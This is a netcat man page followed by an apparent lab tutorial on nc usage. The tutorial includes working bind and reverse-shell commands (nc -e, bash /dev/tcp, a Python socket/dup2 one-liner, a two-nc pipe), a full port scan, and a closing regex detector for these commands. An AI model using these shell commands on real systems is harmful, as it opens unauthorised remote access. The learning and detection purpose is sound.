Some usage examples follow the man page below.
NC(1) General Commands Manual
NAME
nc - TCP/IP swiss army knife
SYNOPSIS
nc [-options] hostname port[s] [ports] ...
nc -l -p port [-options] [hostname] [port]
DESCRIPTION
netcat is a simple unix utility which reads and writes data across network connections, using TCP or UDP protocol. It is designed to be a reliable "back-end" tool that can be used directly or easily driven by other programs and scripts. At the same time, it is a feature-rich network debugging and exploration tool, since it can create almost any kind of connection you would need and has several interesting built-in capabilities. Netcat, or "nc" as the actual program is named, should have been supplied long ago as another one of those cryptic but standard Unix tools.
In the simplest usage, "nc host port" creates a TCP connection to the given port on the given target host. Your standard input is then sent to the host, and anything that comes back across the connection is sent to your standard output. This continues indefinitely, until the network side of the connection shuts down. Note that this behavior is different from most other applications which shut everything down and exit after an end-of-file on the standard input.
Netcat can also function as a server, by listening for inbound connections on arbitrary ports and then doing the same reading and writing. With minor limitations, netcat doesn't really care if it runs in "client" or "server" mode -- it still shovels data back and forth until there isn't any more left. In either mode, shutdown can be forced after a configurable time of inactivity on the network side.
And it can do this via UDP too, so netcat is possibly the "udp telnet-like" application you always wanted for testing your UDP-mode servers. UDP, as the "U" implies, gives less reliable data transmission than TCP connections and some systems may have trouble sending large amounts of data that way, but it's still a useful capability to have.
You may be asking "why not just use telnet to connect to arbitrary ports?" Valid question, and here are some reasons. Telnet has the "standard input EOF" problem, so one must introduce calculated delays in driving scripts to allow network output to finish. This is the main reason netcat stays running until the *network* side closes. Telnet also will not transfer arbitrary binary data, because certain characters are interpreted as telnet options and are thus removed from the data stream. Telnet also emits some of its diagnostic messages to standard output, where netcat keeps such things religiously separated from its *output* and will never modify any of the real data in transit unless you *really* want it to. And of course telnet is incapable of listening for inbound connections, or using UDP instead. Netcat doesn't have any of these limitations, is much smaller and faster than telnet, and has many other advantages.
OPTIONS
-c string    specify shell commands to exec after connect (use with caution). The string is passed to /bin/sh -c for execution. See the -e option if you don't have a working /bin/sh (Note that POSIX-conformant system must have one).
-e filename  specify filename to exec after connect (use with caution). See the -c option for enhanced functionality.
-g gateway   source-routing hop point[s], up to 8
-G num       source-routing pointer: 4, 8, 12, ...
-h           display help
-i secs      delay interval for lines sent, ports scanned
-l           listen mode, for inbound connects
-L           keep listening after the client closes the connection
-n           numeric-only IP addresses, no DNS
-o file      hex dump of traffic
-p port      local port number (port numbers can be individual or ranges: lo-hi [inclusive])
-q seconds   after EOF on stdin, wait the specified number of seconds and then quit. If seconds is negative, wait forever.
-b           allow UDP broadcasts
-r           randomize local and remote ports (listen on whatever port gets picked)
-s addr      local source address (used for spoofing)
-t           enable telnet negotiation
-u           UDP mode
-v           verbose [use twice to be more verbose]
-w secs      timeout for connects and final net reads
-C           Send CRLF as line-ending
-z           zero-I/O mode [used for scanning]
-T type      set TOS flag (type may be one of "Minimize-Delay", "Maximize-Throughput", "Maximize-Reliability", or "Minimize-Cost".)
COPYRIGHT
Netcat is entirely my own creation, although plenty of other code was used as examples. It is freely given away to the Internet community in the hope that it will be useful, with no restrictions except giving credit where it is due. No GPLs, Berkeley copyrights or any of that nonsense. The author assumes NO responsibility for how anyone uses it. If netcat makes you rich somehow and you're feeling generous, mail me a check. If you are affiliated in any way with Microsoft Network, get a life. Always ski in control. Comments, questions, and patches to hobbit@avian.org.
NOTES
Some port names in /etc/services contain hyphens -- netcat currently will not correctly parse those unless you escape the hyphens with backslashes (e.g. "netcat localhost 'ftp\-data'").
BUGS
Efforts have been made to have netcat "do the right thing" in all its various modes. If you believe that it is doing the wrong thing under whatever circumstances, please notify me and tell me how you think it should behave. If netcat is not able to do some task you think up, minor tweaks to the code will probably fix that. It provides a basic and easily-modified template for writing other network applications, and I certainly encourage people to make custom mods and send in any improvements they make to it. Continued feedback from the Internet community is always welcome!
EXAMPLES
For several netcat recipes, please see /usr/share/doc/netcat/README.gz
and /usr/share/doc/netcat/README.Debian.gz.
AUTHOR
This manual page was written by Joey Hess <joeyh@debian.org> and Robert
Woodcock <rcw@debian.org>, cribbing heavily from Netcat's README file.
Netcat was written by a guy we know as the Hobbit <hobbit@avian.org>.
NC(1)
Download: https://eternallybored.org/misc/netcat/
Some simple examples (Windows, 64-bit):
- Start the server:
Open a window:
F:\SecTools\apps\netcat-win32-1.12>nc64 -l -p 4444
(allow it through the firewall prompt) The server is now listening.
- Connect to the server
Then open another window and enter:
# use your own IP address
F:\SecTools\apps\netcat-win32-1.12>nc64 10.20.3.129 4444
There is no echo or prompt at this point, but the connection has succeeded; type anything:
Whatever the client sends is printed by the server, and whatever the server sends is printed by the client.
- Start a shell server
F:\SecTools\apps\netcat-win32-1.12>nc64 -l -p 4444 -e cmd.exe
- Connect to it
sanqiushu@DESKTOP-343EN6M:~$ nc 10.20.3.129 4444
Microsoft Windows [版本 10.0.17134.885]
(c) 2018 Microsoft Corporation。保留所有权利。
F:\SecTools\apps\netcat-win32-1.12>
Right after connecting you get a command prompt back (to go a different route, I used the Linux version of nc).
F:\SecTools\apps\netcat-win32-1.12>dir
dir
F еľ ʱ
卷的序列号是 1646-F9AD
F:\SecTools\apps\netcat-win32-1.12 的目录
2019/08/14 15:08 <DIR> .
2019/08/14 15:08 <DIR> ..
2004/12/28 12:23 12,166 doexec.c
1996/07/09 17:01 7,283 generic.h
1996/11/06 23:40 22,784 getopt.c
1994/11/03 20:07 4,765 getopt.h
1998/02/06 16:50 61,780 hobbit.txt
2004/12/27 18:37 18,009 license.txt
2011/09/17 00:46 300 Makefile
2019/08/14 14:42 4 nc.bat
2011/09/17 00:52 38,616 nc.exe
2011/09/17 00:52 45,272 nc64.exe
2011/09/17 00:44 69,850 netcat.c
2011/09/17 00:45 6,885 readme.txt
12 个文件 287,714 字节
2 个目录 199,469,047,808 可用字节
F:\SecTools\apps\netcat-win32-1.12>
Commands can be run directly (though the Chinese output came back garbled, which is a headache); it seems better to connect Windows to Windows and Linux to Linux from now on.
- File transfer
The server receives the file:
F:\SecTools\apps\netcat-win32-1.12>nc64 -l -p 4444 >F:\SecTools\apps\netcat-win32-1.12\readme2.txt
The client sends the file:
F:\SecTools\apps\netcat-win32-1.12>nc64 10.20.3.129 4444 < F:\SecTools\apps\netcat-win32-1.12\readme.txt
Neither side shows any reaction, but the transfer has completed.
Why does the Windows one need an absolute path?
The Linux sender seems to need an absolute path too???
The client receives the file:
F:\SecTools\apps\netcat-win32-1.12>nc64 10.20.3.129 4444 > F:\SecTools\apps\netcat-win32-1.12\readme3.txt
The server sends the file:
F:\SecTools\apps\netcat-win32-1.12>nc64 -l -p 4444 < F:\SecTools\apps\netcat-win32-1.12\readme.txt
A parameter like -w5 sets the wait time: if the network delay exceeds 5 s and the connection is still not established, the command ends.
- Port scanning
The port-scan speed of the Windows nc is unbelievably slow; by the time it finished I felt half dead.
The one on Ubuntu is no good either.
But the nc on Kali Linux is really impressive:
root@Sanqiushu:~# nc -z -v -n 10.20.7.7 1-65535
(UNKNOWN) [10.20.7.7] 8080 (http-alt) open
(UNKNOWN) [10.20.7.7] 7001 (afs3-callback) open
(UNKNOWN) [10.20.7.7] 22 (ssh) open
root@Sanqiushu:~#
A full-port scan took less than 2 minutes.
root@Sanqiushu:~# echo "" | nc -v -n 10.20.7.7 1-65535
(UNKNOWN) [10.20.7.7] 8080 (http-alt) open
(UNKNOWN) [10.20.7.7] 7001 (afs3-callback) open
(UNKNOWN) [10.20.7.7] 22 (ssh) open
SSH-2.0-OpenSSH_7.6p1 Ubuntu-4ubuntu0.3
Protocol mismatch.
root@Sanqiushu:~#
Some services do not reply with a banner.
- Set up a listening (bind) backdoor
F:\SecTools\apps\netcat-win32-1.12>nc -l -p 4444 -e cmd.exe
- Set up a connect-back (reverse) backdoor
Your own server starts listening:
F:\SecTools\apps\netcat-win32-1.12>nc -l -p 4444
The client connects:
F:\SecTools\apps\netcat-win32-1.12>nc64 10.20.3.129 4444 -e cmd.exe
Once the client has connected, the server gets a command-line terminal:
Microsoft Windows [版本 10.0.17134.885]
(c) 2018 Microsoft Corporation。保留所有权利。
F:\SecTools\apps\netcat-win32-1.12>
The Windows side starts the listener:
F:\SecTools\apps\netcat-win32-1.12>nc -l -p 4444
Kali connects:
root@Sanqiushu:~# nc 10.20.3.129 4444 -e /bin/bash
Although nothing comes back, a shell has already been returned and you can run commands directly (if you type a wrong command you will not see the error message on your side, which is odd); some Linux versions of nc have no -e option, Ubuntu's for example.
Use the -d parameter to make nc run in the background.
- Port forwarding
A wants to connect to C but cannot do so directly, so B is used to forward the connection.
- Reverse bash shell from a Linux machine without nc
Kali starts the nc listener (firewall off):
root@Sanqiushu:~# nc -lvp 4444
listening on [any] 4444 ...
Then enter this command on Ubuntu:
sanqiushu@sanqiushu-VirtualBox:~$ bash -i >& /dev/tcp/10.20.2.185/4444 0>&1
Kali receives the shell:
root@Sanqiushu:~# nc -lvp 4444
listening on [any] 4444 ...
10.20.7.7: inverse host lookup failed: Unknown host
connect to [10.20.2.185] from (UNKNOWN) [10.20.7.7] 35130
sanqiushu@sanqiushu-VirtualBox:~$ ls
ls
vulhub
公共的
模板
视频
图片
文档
下载
音乐
桌面
sanqiushu@sanqiushu-VirtualBox:~$
- Python shell from a Linux machine without nc
Kali sets up the nc listener:
root@Sanqiushu:~# nc -lvp 4444
listening on [any] 4444 ...
Ubuntu runs the Python client:
sanqiushu@sanqiushu-VirtualBox:~$ python -c "import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('10.20.2.185',4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);"
Kali receives the connection:
10.20.7.7: inverse host lookup failed: Unknown host
connect to [10.20.2.185] from (UNKNOWN) [10.20.7.7] 35144
sanqiushu@sanqiushu-VirtualBox:~$ ls
vulhub
公共的
模板
视频
图片
文档
下载
音乐
桌面
sanqiushu@sanqiushu-VirtualBox:~$
The Python 2 code:
import os,socket,subprocess
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(('10.20.2.185',4444)) # open the remote connection s; change the IP and port as needed
os.dup2(s.fileno(),0) # redirect stdin to s's file descriptor
os.dup2(s.fileno(),1) # redirect stdout to s's file descriptor
os.dup2(s.fileno(),2) # redirect stderr to s's file descriptor
p=subprocess.call(['/bin/bash','-i'])
Afterwards, use Python again to create an interactive (pty) shell:
python -c 'import pty;pty.spawn("/bin/bash")'
- Reverse shell with an nc that does not support -e
nc 10.20.2.185 4444 | /bin/bash | nc 10.20.2.185 4445
Fairly slow; I waited about 10 s.
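The reverse-shell and scan commands collected on this page are also what a defender looks for in process-execution telemetry. As an added example (not from the page or from netcat), the Python 3 below runs a few rules over constructed command lines modelled on the page's own commands; the rule names and sample lines are my own.

```python
import re

# Constructed sample process command lines (not real logs), modelled on the
# commands shown on this page; the rule names below are my own.
SAMPLE_CMDLINES = [
    "nc64 -l -p 4444 -e cmd.exe",
    "nc 10.20.3.129 4444 -e /bin/bash",
    "bash -i >& /dev/tcp/10.20.2.185/4444 0>&1",
    ("python -c \"import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);"
     "s.connect(('10.20.2.185',4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);"
     "os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);\""),
    "nc 10.20.2.185 4444 | /bin/bash | nc 10.20.2.185 4445",
    "python -c 'import pty;pty.spawn(\"/bin/bash\")'",
    "nc -z -v -n 10.20.7.7 1-65535",
    "nc -l -p 4444 > readme2.txt",  # plain file transfer: not flagged by these rules
    "ls -la /home",
]

# Each rule targets one technique from the page: nc -e handing a shell to the
# socket, bash's /dev/tcp redirection, the Python socket+dup2 one-liner, the
# pty upgrade, the two-nc pipe, and zero-I/O (-z) port-range scanning.
RULES = [
    ("nc-exec-shell", re.compile(r"\bnc(?:64)?\b.*\s-e\s+\S*(?:cmd\.exe|/bin/(?:ba)?sh)")),
    ("bash-dev-tcp", re.compile(r"/dev/tcp/\d{1,3}(?:\.\d{1,3}){3}/\d+")),
    ("python-socket-dup2-shell", re.compile(r"\.connect\(.*dup2\(.*/bin/(?:ba)?sh")),
    ("pty-spawn-shell", re.compile(r"pty\.spawn\(\s*['\"]/bin/(?:ba)?sh")),
    ("nc-pipe-shell", re.compile(r"\bnc\b[^|]*\|\s*/bin/(?:ba)?sh\s*\|\s*nc\b")),
    ("nc-zero-io-scan", re.compile(r"\bnc\b.*\s-z\b.*\b\d+-\d+\b")),
]


def classify(cmdline):
    """Return the names of every rule that matches one command line."""
    return [name for name, rx in RULES if rx.search(cmdline)]


def scan(cmdlines):
    """Return (cmdline, rule names) for each line that matched at least one rule."""
    hits = [(line, classify(line)) for line in cmdlines]
    return [(line, names) for line, names in hits if names]


if __name__ == "__main__":
    for line, names in scan(SAMPLE_CMDLINES):
        print(", ".join(names), "<-", line)
```

The plain file-transfer and scan lines show the trade-off: redirecting a socket to a file is not flagged, while a -z range scan is reported as reconnaissance rather than as a shell.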